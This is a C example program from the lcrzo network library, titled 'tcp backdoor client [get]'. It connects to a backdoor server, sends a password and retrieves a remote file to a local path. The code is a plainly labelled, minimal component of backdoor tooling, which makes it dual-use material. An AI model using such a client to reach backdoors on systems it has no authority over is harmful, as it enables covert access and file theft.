
/* include the library headers */
#include <lcrzo.h>
#include "lcrzoex.h"

/*-------------------------------------------------------------*/
/* set information about this example */
shared_lcrzoex_infos lcrzoex_000387=
{ /*reference*/     "lcrzoex", 387,
  /*version*/       1, 0,
  /*title*/         "tcp backdoor client [get]",
  /*french title*/  "client tcp backdoor [get]",
  /*description*/   "",
  /*french desc.*/  "",
  /*usage*/         "server_name server_port distantfile localfile",
  /*french usage*/  "nom_serveur port_serveur fichierdistant fichierlocal",
  /*usage example*/ "1.2.3.4 1234 /tmp/file /tmp/filehere",
  /*fr. usage ex.*/ "1.2.3.4 1234 /tmp/fichier /tmp/fichierici",
  /*author*/        "Laurent"
};

/*-------------------------------------------------------------*/
/* function declarations */
int lcrzoex_000387_main(int argc, char *argv[]);
int lcrzoex_000385_auth(lcrzo_sock *psock, lcrzo_conststring password);
int lcrzoex_000385_quit(lcrzo_sock *psock);
int lcrzoex_000385_get(lcrzo_sock *psock, 
		       lcrzo_conststring parameters);

/*-------------------------------------------------------------*/
/* main function : you can rename it to "main", and then this file
   can be compiled alone. */
int lcrzoex_000387_main(int argc, char *argv[])
{ lcrzo_ipl ipl;
  lcrzo_uint16 port;
  lcrzo_sock sock;
  lcrzo_string passwd, parameters;
  
  lcrzo_init();
  if ( argc<5 )
  { /* print usage */
    lcrzo_epr(shared_lcrzoex_infos_print(lcrzoex_000387, argv[0]));
    return(LCRZOEX_ERR_MISC_BADTOOLUSAGE);
  }

  /* initialize addresses */
  lcrzo_epr(shared_para_ipl_init_dst(argv[1], &ipl));

  /* initialize the client */
  lcrzo_epr(shared_para_port_init_dst(argv[2], 0, &port));
  lcrzo_epr(lcrzo_sock_tcpcli_real(ipl, port, &sock));

  /* authenticate */
  lcrzo_epr(lcrzo_string_initm_text_passwd("Passwd", "", &passwd));
  lcrzo_epr(lcrzoex_000385_auth(&sock, passwd));
  lcrzo_epr(lcrzo_string_free2(&passwd));

  /* exec */
  lcrzo_epr(lcrzo_string_initm_text(argv[3], &parameters));
  lcrzo_epr(lcrzo_string_appendm_text(" ", &parameters));
  lcrzo_epr(lcrzo_string_appendm_text(argv[4], &parameters));
  lcrzo_epr(lcrzoex_000385_get(&sock, parameters));
  lcrzo_epr(lcrzo_string_free2(&parameters));

  /* quit */
  lcrzo_epr(lcrzoex_000385_quit(&sock));

  /* close the client */
  lcrzo_epr(lcrzo_sock_close(&sock));

  lcrzo_close();
  return(LCRZO_ERR_OK);
}
